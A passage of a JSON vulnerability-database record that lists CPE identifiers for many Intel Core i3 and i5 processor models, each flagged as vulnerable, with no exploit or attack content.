                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3110m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3115c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3120m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3120me:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3130m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3210:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3217u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3217ue:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3220:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3220t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3225:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3227u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3229y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3240:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3240t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3245:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3250:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3250t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4000m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4005u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4010u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4010y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4012y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4020y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4025u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4030u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4030y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4100e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4100m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4100u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4102e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4110e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4110m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4112e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4120u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4130:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4130t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4150:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4150t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4158u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4160:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4160t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4170:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4170t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4330:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4330t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4330te:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4340:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4340te:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4350:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4350t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4360:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4360t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4370:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4370t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:5005u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:5010u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:5015u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:5020u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:5157u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6006u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6098p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100h:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100te:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6102e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6157u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6167u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6300:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6300t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6320:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:8100:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:8350k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:430m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:430um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:450m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:460m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:470um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:480m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:520e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:520m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:520um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:540m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:540um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:560m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:560um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:580m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:650:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:655k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:660:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:661:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:670:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:680:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:750:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:750s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:760:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2300:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2310:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2320:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2380p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2390t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2400:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2400s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2405s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2410m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2430m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2435m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2450m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2450p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2467m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2500:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2500k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2500s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2500t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2510e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2515e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2520m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2537m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2540m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2550k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2557m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3210m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3230m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3317u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3320m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3330:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3330s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3337u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3339y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3340:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3340m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3340s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3350p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3360m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3380m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3427u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3437u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3439y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3450:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3450s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3470:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3470s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3470t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3475s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3550:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3550s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3570:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3570k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3570s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3570t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3610me:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4200h:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4200m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4200u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4200y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4202y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4210h:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4210m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4210u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4210y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4220y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4250u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4258u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4260u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4278u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4288u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4300m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4300u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4300y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4302y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4308u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4310m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4310u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4330m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4340m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4350u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4360u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4400e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4402e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4402ec:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4410e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4422e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4430:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4430s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4440:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4440s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4460:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4460s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4460t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570te:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4590:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4590s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4590t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670:*:*:*:*:*:*:*",
